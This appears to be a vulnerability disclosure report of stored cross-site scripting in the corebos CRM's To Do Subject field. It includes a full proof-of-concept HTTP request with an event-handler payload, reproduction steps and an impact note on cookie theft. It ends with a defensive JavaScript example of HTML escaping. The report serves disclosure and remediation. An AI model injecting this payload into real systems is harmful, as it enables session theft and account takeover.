Cross-site Scripting (XSS) - Stored in tsolucio/corebos
Reported on
Sep 22nd 2021
Description
Stored XSS in the Subject field of To Dos
Proof of Concept
// PoC Request
POST /corebos/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------136503058339251009483555336795
Content-Length: 7141
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/corebos/index.php?module=cbCalendar&action=EditView&return_action=DetailView
Cookie: ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=609786462376996; _orangehrm=929bfb55f5e0dde7a982136b062a17de; BOXSID=4ipvdaiqhuu670rjgo3bspnd4h; 127001corebos=r2lm7d6pp76a2s5jsikfuv39k5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="__vt5rftk"
sid:3d0d662748c7e5561397afa2030143ed4c6533f8,1632324889
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="MAX_FILE_SIZE"
3000000
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="pagenumber"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="module"
cbCalendar
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="record"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="mode"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="action"
Save
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="saverepeat"
0
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_module"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_id"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_action"
DetailView
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="return_viewname"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="createmode"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cbcustominfo1"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cbcustominfo2"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="Module_Popup_Edit"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="Module_Popup_Save"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="Module_Popup_Save_Param"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="FILTERFIELDSMAP"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="search_url"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="subject"
"><iMg SrC="x" oNeRRor="alert(1);">
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="assigntype"
U
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="assigned_user_id"
1
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="assigned_group_id"
3
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="dtstart"
2021-09-22 03:34
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="timefmt_dtstart"
PM
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="dtend"
2021-09-22 04:34
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="timefmt_dtend"
PM
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="rel_id_type"
Accounts
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="rel_id"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="rel_id_display"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cto_id_type"
Contacts
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cto_id"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="cto_id_display"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="eventstatus"
Planned
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="taskpriority"
High
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="activitytype"
Call
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="visibility"
Private
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="location"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="relatedwith_type"
cbCalendar
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="relatedwith"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="relatedwith_display"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="description"
test
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="followupdt"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="timefmt_followupdt"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="followuptype"
Call
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="inviteesid"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="set_reminder"
No
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="remdays"
0
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="remhrs"
0
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="remmin"
10
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeat_frequency"
1
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="recurringtype"
Daily
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="calendar_repeat_limit_date"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth"
date
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth_date"
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth_daytype"
first
-----------------------------136503058339251009483555336795
Content-Disposition: form-data; name="repeatMonth_day"
1
-----------------------------136503058339251009483555336795--
Steps to reproduce
Go to My Home Page > To Dos > Create To Do
In the Subject input, enter the payload "><iMg SrC="x" oNeRRor="alert(1);">
The XSS triggers in the notification shown afterwards; it may take a few seconds to appear
Video PoC: PoC
Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie. When the malicious To Do is assigned to a group, the attacker can obtain the cookies of every user in that group.
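As an added example (not corebos code), the JavaScript below shows the root cause and the fix from a defender's side: the subject is placed into notification markup without output encoding. The report's payload opens with `">` precisely so that it closes an attribute and starts a new tag, so the encoding must cover quotes as well as angle brackets. The two render functions are hypothetical stand-ins for the notification template, not the project's own code.

```javascript
// Added example: HTML-context escaping for an untrusted To Do subject.
// Assumption: the notification is built from a template string in which the
// subject appears both inside an attribute and as element text.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape every character that can change meaning in an HTML body or a
// double/single-quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// The payload from the report, reused here as a constructed test input.
const PAYLOAD = '"><iMg SrC="x" oNeRRor="alert(1);">';

// Vulnerable pattern: raw subject concatenated into markup. The leading `">`
// terminates the title attribute and the rest becomes a live <img> element.
function renderNotificationUnsafe(subject) {
  return `<div class="notif" title="${subject}">${subject}</div>`;
}

// Hardened pattern: the same template, but every untrusted value is escaped
// for the HTML context before insertion. The payload is rendered as text.
function renderNotificationSafe(subject) {
  const s = escapeHtml(subject);
  return `<div class="notif" title="${s}">${s}</div>`;
}

// Regression check for a test suite: count element start tags in the rendered
// markup. Only the wrapper <div> should be present when escaping is correct.
function countStartTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}
```

Running `countStartTags` over both renderings makes the difference measurable: the unsafe output contains two injected `<iMg` tags in addition to the wrapper, the safe output contains the wrapper only.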